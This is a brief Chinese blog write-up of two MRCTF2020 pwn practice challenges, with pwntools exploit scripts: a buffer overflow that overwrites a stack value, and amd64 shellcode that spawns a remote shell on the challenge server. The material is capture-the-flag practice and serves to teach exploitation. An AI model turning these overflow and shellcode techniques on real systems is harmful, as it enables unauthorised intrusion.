0%

MRCTF2020复现

比赛又不会打,题目又懒得做
像👴这种懒🐕只能在buu刷刷题,顺便复现一下MRCTF维持一下生活的亚子

easyoverflow

简单的溢出修改内容进入后门
exp:

1
2
3
4
5
6
7
8
9
10
11
from pwn import *
context.log_level='debug'
#p=process('./mrctf2020_easyoverflow')
p=remote('node3.buuoj.cn',25110)
elf=ELF('./mrctf2020_easyoverflow')

offset=0x70-0x40
fake_flag='n0t_r3@11y_f1@g'
payload='a'*offset+fake_flag
p.sendline(payload)
p.interactive()

shellcode

简单amd64输入shellcode即可,但是注意这里程序f5反编译不出来。
exp:

1
2
3
4
5
6
7
8
9
10
11
from pwn import *
context.log_level='debug'
context.arch = 'amd64'
#p=process('./mrctf2020_shellcode')
p=remote('node3.buuoj.cn',27980)
elf=ELF('./mrctf2020_shellcode')

shellcode=asm(shellcraft.sh())
print(shellcode)
p.sendline(shellcode)
p.interactive()
好饿啊,早知道不学安全了